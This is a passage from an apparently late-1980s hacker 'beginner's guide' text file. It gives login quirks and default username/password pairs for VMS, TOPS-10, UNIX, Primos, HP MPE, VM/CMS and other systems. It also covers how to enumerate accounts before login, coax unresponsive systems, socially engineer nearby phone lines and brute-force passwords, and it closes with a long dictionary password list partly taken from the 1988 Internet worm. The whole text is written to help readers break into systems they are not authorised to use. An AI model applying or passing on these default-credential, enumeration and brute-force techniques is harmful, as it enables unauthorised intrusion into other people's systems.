           It is one of the most secure operating systems around from the
           outside, but once you're in there are many things that you can do
           to circumvent system security.  The VAX also has the best set of
           help files in the world.  Just type HELP and read to your heart's
           content.
           Common Accounts/Defaults:  [username: password [[,password]] ]
           SYSTEM:     OPERATOR or MANAGER or SYSTEM or SYSLIB
           OPERATOR:   OPERATOR
           SYSTEST:    UETP
           SYSMAINT:   SYSMAINT or SERVICE or DIGITAL
           FIELD:      FIELD or SERVICE
           GUEST:      GUEST or unpassworded
           DEMO:       DEMO  or unpassworded
           DECNET:     DECNET


DEC-10-    An earlier line of DEC computer equipment, running the TOPS-10
           operating system.  These machines are recognized by their
           '.' prompt.  The DEC-10/20 series are remarkably hacker-friendly,
           allowing you to enter several important commands without ever
           logging into the system.  Accounts are in the format [xxx,yyy] where
           xxx and yyy are integers.  You can get a listing of the accounts and
           the process names of everyone on the system before logging in with
           the command .systat (for SYstem STATus).  If you seen an account
           that reads [234,1001]   BOB JONES, it might be wise to try BOB or
           JONES or both for a password on this account.  To login, you type
           .login xxx,yyy  and then type the password when prompted for it.
           The system will allow you unlimited tries at an account, and does
           not keep records of bad login attempts.  It will also inform you
           if the UIC you're trying (UIC = User Identification Code, 1,2 for
           example) is bad.
           Common Accounts/Defaults:
           1,2:        SYSLIB or OPERATOR or MANAGER
           2,7:        MAINTAIN
           5,30:       GAMES

UNIX-      There are dozens of different machines out there that run UNIX.
           While some might argue it isn't the best operating system in the
           world, it is certainly the most widely used.  A UNIX system will
           usually have a prompt like 'login:' in lower case.  UNIX also
           will give you unlimited shots at logging in (in most cases), and
           there is usually no log kept of bad attempts.
           Common Accounts/Defaults: (note that some systems are case
           sensitive, so use lower case as a general rule.  Also, many times
           the accounts will be unpassworded, you'll just drop right in!)
           root:       root
           admin:      admin
           sysadmin:   sysadmin or admin
           unix:       unix
           uucp:       uucp
           rje:        rje
           guest:      guest
           demo:       demo
           daemon:     daemon
           sysbin:     sysbin

Prime-     Prime computer company's mainframe running the Primos operating
           system.  The are easy to spot, as the greet you with
           'Primecon 18.23.05' or the like, depending on the version of the
           operating system you run into.  There will usually be no prompt
           offered, it will just look like it's sitting there.  At this point,
           type 'login <username>'.  If it is a pre-18.00.00 version of Primos,
           you can hit a bunch of ^C's for the password and you'll drop in.
           Unfortunately, most people are running versions 19+.  Primos also
           comes with a good set of help files.  One of the most useful
           features of a Prime on Telenet is a facility called NETLINK.  Once
           you're inside, type NETLINK and follow the help files.  This allows
           you to connect to NUA's all over the world using the 'nc' command.
           For example, to connect to NUA 026245890040004, you would type
           @nc :26245890040004 at the netlink prompt.
           Common Accounts/Defaults:
           PRIME       PRIME or PRIMOS
           PRIMOS_CS   PRIME or PRIMOS
           PRIMENET    PRIMENET
           SYSTEM      SYSTEM or PRIME
           NETLINK     NETLINK
           TEST        TEST
           GUEST       GUEST
           GUEST1      GUEST

HP-x000-   This system is made by Hewlett-Packard.  It is characterized by the
           ':' prompt.  The HP has one of the more complicated login sequences
           around- you type 'HELLO SESSION NAME,USERNAME,ACCOUNTNAME,GROUP'.
           Fortunately, some of these fields can be left blank in many cases.
           Since any and all of these fields can be passworded, this is not
           the easiest system to get into, except for the fact that there are
           usually some unpassworded accounts around.  In general, if the
           defaults don't work, you'll have to brute force it using the
           common password list (see below.)  The HP-x000 runs the MPE operat-
           ing system, the prompt for it will be a ':', just like the logon
           prompt.
           Common Accounts/Defaults:
           MGR.TELESUP,PUB                      User: MGR Acct: HPONLY Grp: PUB
           MGR.HPOFFICE,PUB                     unpassworded
           MANAGER.ITF3000,PUB                  unpassworded
           FIELD.SUPPORT,PUB                    user: FLD,  others unpassworded
           MAIL.TELESUP,PUB                     user: MAIL, others
unpassworded
           MGR.RJE                              unpassworded
           FIELD.HPPl89 ,HPPl87,HPPl89,HPPl96   unpassworded
           MGR.TELESUP,PUB,HPONLY,HP3           unpassworded


IRIS-      IRIS stands for Interactive Real Time Information System.  It orig-
           inally ran on PDP-11's, but now runs on many other minis.  You can
           spot an IRIS by the 'Welcome to "IRIS" R9.1.4 Timesharing' banner,
           and the ACCOUNT ID? prompt.  IRIS allows unlimited tries at hacking
           in, and keeps no logs of bad attempts.  I don't know any default
           passwords, so just try the common ones from the password database
           below.
           Common Accounts:
           MANAGER
           BOSS
           SOFTWARE
           DEMO
           PDP8
           PDP11
           ACCOUNTING

VM/CMS-    The VM/CMS operating system runs in International Business Machines
           (IBM) mainframes.  When you connect to one of these, you will get
           message similar to 'VM/370 ONLINE', and then give you a '.' prompt,
           just like TOPS-10 does.  To login, you type 'LOGON <username>'.
           Common Accounts/Defaults are:
           AUTOLOG1:            AUTOLOG or AUTOLOG1
           CMS:                 CMS
           CMSBATCH:            CMS or CMSBATCH
           EREP:                EREP
           MAINT:               MAINT or MAINTAIN
           OPERATNS:            OPERATNS or OPERATOR
           OPERATOR:            OPERATOR
           RSCS:                RSCS
           SMART:               SMART
           SNA:                 SNA
           VMTEST:              VMTEST
           VMUTIL:              VMUTIL
           VTAM:                VTAM

NOS-       NOS stands for Networking Operating System, and runs on the Cyber
           computer made by Control Data Corporation.  NOS identifies itself
           quite readily, with a banner of 'WELCOME TO THE NOS SOFTWARE
           SYSTEM.  COPYRIGHT CONTROL DATA 1978,1987'.  The first prompt you
           will get will be FAMILY:.  Just hit return here.  Then you'll get
           a USER NAME: prompt.  Usernames are typically 7 alpha-numerics
           characters long, and are *extremely* site dependent. Operator
           accounts begin with a digit, such as 7ETPDOC.
           Common Accounts/Defaults:
           $SYSTEM              unknown
           SYSTEMV              unknown

Decserver- This is not truly a computer system, but is a network server that
           has many different machines available from it.  A Decserver will
           say 'Enter Username>' when you first connect.  This can be anything,
           it doesn't matter, it's just an identifier.  Type 'c', as this is
           the least conspicuous thing to enter.  It will then present you
           with a 'Local>' prompt.  From here, you type 'c <systemname>' to
           connect to a system.  To get a list of system names, type
           'sh services' or 'sh nodes'.  If you have any problems, online
           help is available with the 'help' command.  Be sure and look for
           services named 'MODEM' or 'DIAL' or something similar, these are
           often outdial modems and can be useful!

GS/1-      Another type of network server.  Unlike a Decserver, you can't
           predict what prompt a GS/1 gateway is going to give you.  The
           default prompt it 'GS/1>', but this is redifinable by the
           system administrator.  To test for a GS/1, do a 'sh d'.  If that
           prints out a large list of defaults (terminal speed, prompt,
           parity, etc...), you are on a GS/1.  You connect in the same manner
           as a Decserver, typing 'c <systemname>'.  To find out what systems
           are available, do a 'sh n' or a 'sh c'.  Another trick is to do a
           'sh m', which will sometimes show you a list of macros for logging
           onto a system.  If there is a macro named VAX, for instance, type
           'do VAX'.

           The above are the main system types in use today.  There are
           hundreds of minor variants on the above, but this should be
           enough to get you started.
         
Unresponsive Systems
~~~~~~~~~~~~~~~~~~~~
   Occasionally you will connect to a system that will do nothing but sit
there.  This is a frustrating feeling, but a methodical approach to the system
will yield a response if you take your time.  The following list will usually
make *something* happen.
1)  Change your parity, data length, and stop bits.  A system that won't re-
    spond at 8N1 may react at 7E1 or 8E2 or 7S2.  If you don't have a term
    program that will let you set parity to EVEN, ODD, SPACE, MARK, and NONE,
    with data length of 7 or 8, and 1 or 2 stop bits, go out and buy one.
    While having a good term program isn't absolutely necessary, it sure is
    helpful.
2)  Change baud rates.  Again, if your term program will let you choose odd
    baud rates such as 600 or 1100, you will occasionally be able to penetrate
    some very interesting systems, as most systems that depend on a strange
    baud rate seem to think that this is all the security they need...
3)  Send a series of <cr>'s.
4)  Send a hard break followed by a <cr>.
5)  Type a series of .'s (periods).  The Canadian network Datapac responds
    to this.
6)  If you're getting garbage, hit an 'i'.  Tymnet responds to this, as does
    a MultiLink II.
7)  Begin sending control characters, starting with ^A --> ^Z.
8)  Change terminal emulations.  What your vt100 emulation thinks is garbage
    may all of a sudden become crystal clear using ADM-5 emulation.  This also
    relates to how good your term program is.
9)  Type LOGIN, HELLO, LOG, ATTACH, CONNECT, START, RUN, BEGIN, LOGON, GO,
    JOIN, HELP, and anything else you can think of.
10) If it's a dialin, call the numbers around it and see if a company
    answers.  If they do, try some social engineering.

Brute Force Hacking
~~~~~~~~~~~~~~~~~~~
   There will also be many occasions when the default passwords will not work
on an account.  At this point, you can either go onto the next system on your
list, or you can try to 'brute-force' your way in by trying a large database
of passwords on that one account.  Be careful, though!  This works fine on
systems that don't keep track of invalid logins, but on a system like a VMS,
someone is going to have a heart attack if they come back and see '600 Bad
Login Attempts Since Last Session' on their account.  There are also some
operating systems that disconnect after 'x' number of invalid login attempts
and refuse to allow any more attempts for one hour, or ten minutes, or some-
times until the next day.
   The following list is taken from my own password database plus the data-
base of passwords that was used in the Internet UNIX Worm that was running
around in November of 1988.  For a shorter group, try first names, computer
terms, and obvious things like 'secret', 'password', 'open', and the name
of the account.  Also try the name of the company that owns the computer
system (if known), the company initials, and things relating to the products
the company makes or deals with.

                              Password List
                              =============

      aaa                daniel             jester             rascal
      academia           danny              johnny             really
      ada                dave               joseph             rebecca
      adrian             deb                joshua             remote
      aerobics           debbie             judith             rick
      airplane           deborah            juggle             reagan
      albany             december           julia              robot
      albatross          desperate          kathleen           robotics
      albert             develop            kermit             rolex
      alex               diet               kernel             ronald
      alexander          digital            knight             rosebud
      algebra            discovery          lambda             rosemary
      alias              disney             larry              roses
      alpha              dog                lazarus            ruben
      alphabet           drought            lee                rules
      ama                duncan             leroy              ruth
      amy                easy               lewis              sal
      analog             eatme              light              saxon
      anchor             edges              lisa               scheme
      andy               edwin              louis              scott
      andrea             egghead            lynne              scotty
      animal             eileen             mac                secret
      answer             einstein           macintosh          sensor
      anything           elephant           mack               serenity
      arrow              elizabeth          maggot             sex
      arthur             ellen              magic              shark
      asshole            emerald            malcolm            sharon
      athena             engine             mark               shit
      atmosphere         engineer           markus             shiva
      bacchus            enterprise         marty              shuttle
      badass             enzyme             marvin             simon
      bailey             euclid             master             simple
      banana             evelyn             maurice            singer
      bandit             extension          merlin             single
      banks              fairway            mets               smile
      bass               felicia            michael            smiles
      batman             fender             michelle           smooch
      beauty             fermat             mike               smother
      beaver             finite             minimum            snatch
      beethoven          flower             minsky             snoopy
      beloved            foolproof          mogul              soap
      benz               football           moose              socrates
      beowulf            format             mozart             spit
      berkeley           forsythe           nancy              spring
      berlin             fourier            napoleon           subway
      beta               fred               network            success
      beverly            friend             newton             summer
      bob                frighten           next               super
      brenda             fun                olivia             support
      brian              gabriel            oracle             surfer
      bridget            garfield           orca               suzanne
      broadway           gauss              orwell             tangerine
      bumbling           george             osiris             tape
      cardinal           gertrude           outlaw             target
      carmen             gibson             oxford             taylor
      carolina           ginger             pacific            telephone
      caroline           gnu                painless           temptation
      castle             golf               pam                tiger
      cat                golfer             paper              toggle
      celtics            gorgeous           password           tomato
      change             graham             pat                toyota
      charles            gryphon            patricia           trivial
      charming           guest              penguin            unhappy
      charon             guitar             pete               unicorn
      chester            hacker             peter              unknown
      cigar              harmony            philip             urchin
      classic            harold             phoenix            utility
      coffee             harvey             pierre             vicky
      coke               heinlein           pizza              virginia
      collins            hello              plover             warren
      comrade            help               polynomial         water
      computer           herbert            praise             weenie
      condo              honey              prelude            whatnot
      condom             horse              prince             whitney
      cookie             imperial           protect            will
      cooper             include            pumpkin            william
      create             ingres             puppet             willie
      creation           innocuous          rabbit             winston
      creator            irishman           rachmaninoff       wizard
      cretin             isis               rainbow            wombat
      daemon             japan              raindrop           yosemite
      dancer             jessica            random             zap


Part Four: Wrapping it up!
~~~~~~~~~~~~~~~~~~~~~~~~~~
   I hope this file has been of some help in getting started.  If you're
asking yourself the question 'Why hack?', then you've probably wasted a lot
of time reading this, as you'll never understand.  For those of you who
have read this and found it useful, please send a tax-deductible donation
of $5.00 (or more!) in the name of the Legion of Doom to:
                                       The American Cancer Society
                                       90 Park Avenue
                                       New York, NY  10016



********************************************************************************
References:
1) Introduction to ItaPAC by Blade Runner
   Telecom Security Bulletin #1
2) The IBM VM/CMS Operating System by Lex Luthor
   The LOD/H Technical Journal #2
3) Hacking the IRIS Operating System by The Leftist
   The LOD/H Technical Journal #3
4) Hacking CDC's Cyber by Phrozen Ghost
   Phrack Inc. Newsletter #18
5) USENET comp.risks digest (various authors, various issues)
6) USENET unix.wizards forum (various authors)
7) USENET info-vax forum (various authors)

Recommended Reading:
1) Hackers by Steven Levy
2) Out of the Inner Circle by Bill Landreth
3) Turing's Man by J. David Bolter
4) Soul of a New Machine by Tracy Kidder
5) Neuromancer, Count Zero, Mona Lisa Overdrive, and Burning Chrome, all
   by William Gibson
6) Reality Hackers Magazine c/o High Frontiers, P.O. Box 40271, Berkeley,
   California, 94704, 415-995-2606
7) Any of the Phrack Inc. Newsletters & LOD/H Technical Journals you can find.

Acknowledgements:
   Thanks to my wife for putting up with me.
   Thanks to Lone Wolf for the RSTS & TOPS assistance.
   Thanks to Android Pope for proofreading, suggestions, and beer.
   Thanks to The Urvile/Necron 99 for proofreading & Cyber info.
   Thanks to Eric Bloodaxe for wading through all the trash.
   Thanks to the users of Phoenix Project for their contributions.
   Thanks to Altos Computer Systems, Munich, for the chat system.
   Thanks to the various security personel who were willing to talk to
             me about how they operate.
 
Boards:
   I can be reached on the following systems with some regularity-
       The Phoenix Project:    512/441-3088    300-2400 baud
       Hacker's Den-80:        718/358-9209    300-1200 baud
       Smash Palace South:     512/478-6747    300-2400 baud
       Smash Palace North:     612/633-0509    300-2400 baud

************************************* EOF **************************************







X-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-X
 Another file downloaded from:                     The NIRVANAnet(tm) Seven

 & the Temple of the Screaming Electron   Taipan Enigma        510/935-5845
 Burn This Flag                           Zardoz               408/363-9766
 realitycheck                             Poindexter Fortran   510/527-1662
 Lies Unlimited                           Mick Freen           801/278-2699
 The New Dork Sublime                     Biffnix              415/864-DORK
 The Shrine                               Rif Raf              206/794-6674
 Planet Mirth                             Simon Jester         510/786-6560

                          "Raw Data for Raw Nerves"
X-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-X